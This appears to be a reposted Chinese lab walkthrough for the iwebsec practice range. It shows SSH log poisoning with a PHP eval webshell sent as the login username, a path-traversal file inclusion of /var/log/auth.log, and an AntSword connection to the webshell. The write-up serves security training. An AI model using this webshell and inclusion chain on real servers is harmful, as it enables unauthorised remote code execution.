iwebsec靶場文件包含關卡通關筆記11-ssh日志文件包含

日志包含

1.構造惡意ssh登錄命令

2.配置ssh日志開啟

（1）配置sshd

（2）配置rsyslog

（3）重啟服務

3.寫入webshell木馬

4.獲取php信息滲透

5.蟻劍連接

日志包含

1.構造惡意ssh登錄命令

ssh服務如果開啟了日志記錄功能，那么在進行ssh連接時會將登錄的日志記錄到ssh日志文件內，這個文件的默認路徑是/var/log/auth.log。那么可以通過將連接用戶名設置為惡意代碼，用命令連接服務器iwebsec的服務器，這樣就可以將惡意代碼寫入到日志文件中。

用戶名設置為為如下一句話木馬腳本，參數為ljn

"<?php @eval(\$POST[ljn];?>"

2.配置ssh日志開啟

（1）配置sshd

文件地址為/etc/ssh/sshd_config

SyslogFacility AUTHPRIV
LogLevel INFO

（2）配置rsyslog

ubuntu系統中文件地址為/etc/rsyslog.conf

# The authpriv file has restricted access.
authpriv.*                                              /var/log/auth.log

（3）重啟服務

配置完畢后務必要記住重啟服務，否則修改不生效

service sshd restart
service rsyslog restart

重啟后效果如下

為了避免之前/var/log/auth.log中內容對滲透造成影響，故而將此文件先清空，如下所示：

3.寫入webshell木馬

此實驗只是為了驗證這個漏洞的存在，故而在iwebsec靶場的容器內執行，如下所示通過用戶名向日志寫入一句話馬，參數為ljn，命令如下所示

ssh "<?php @eval(\$_POST[ljn]);?>"@127.0.0.1

執行完整交互如下所示：

[root@bc23a49cb37c /]# ssh "<?php @eval(\$_POST[ljn]);?>"@127.0.0.1
<?php @eval($_POST[ljn]);?>@127.0.0.1's password: 
Permission denied, please try again.
<?php @eval($_POST[ljn]);?>@127.0.0.1's password: 
Permission denied, please try again.
<?php @eval($_POST[ljn]);?>@127.0.0.1's password: 
Permission denied (publickey,gssapi-keyex,gssapi-with-mic,password).

?查看/var/log/auth.log 文件，發現已經將惡意的一句話木馬通過登錄用戶寫入到了ssh登錄日志中，如下所示

[root@bc23a49cb37c /]# cat /var/log/auth.log 
Nov 28 07:07:07 bc23a49cb37c sshd[852]: Invalid user <?php @eval($_POST[ljn]);?> from 127.0.0.1
Nov 28 07:07:07 bc23a49cb37c sshd[853]: input_userauth_request: invalid user <?php @eval($_POST[ljn]);?>
Nov 28 07:07:08 bc23a49cb37c sshd[852]: Failed none for invalid user <?php @eval($_POST[ljn]);?> from 127.0.0.1 port 56172 ssh2
Nov 28 07:07:08 bc23a49cb37c sshd[852]: Failed password for invalid user <?php @eval($_POST[ljn]);?> from 127.0.0.1 port 56172 ssh2
Nov 28 07:07:08 bc23a49cb37c sshd[852]: Failed password for invalid user <?php @eval($_POST[ljn]);?> from 127.0.0.1 port 56172 ssh2
Nov 28 07:07:08 bc23a49cb37c sshd[853]: Connection closed by 127.0.0.1

這里如果沒有生成日志的話，建議重啟一下sshd服務與rsyslog服務再次重試

service rsyslog restart
Shutting down system logger:                               [  OK  ]
Starting system logger:                                    [  OK  ]

4.獲取php信息滲透

ssh登錄的日志名為/var/log/auth.log

于是構造日志訪問路徑 filename=../../../../var/log/auth.log

利用文件包含第01關卡進行滲透

http://192.168.71.151/fi/01.php?filename=../../../../var/log/auth.loghttp://192.168.71.151/fi/01.php?filename=../../../../var/log/auth.log滲透如下所示

5.蟻劍連接

添加url和密碼，分別為http://192.168.71.151/fi/01.php?filename=../../../../var/log/auth.log和ljn，如下所示

進入文件管理模塊

如上所示，滲透成功

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/web/76541.shtml
繁體地址，請注明出處：http://hk.pswp.cn/web/76541.shtml
英文地址，請注明出處：http://en.pswp.cn/web/76541.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！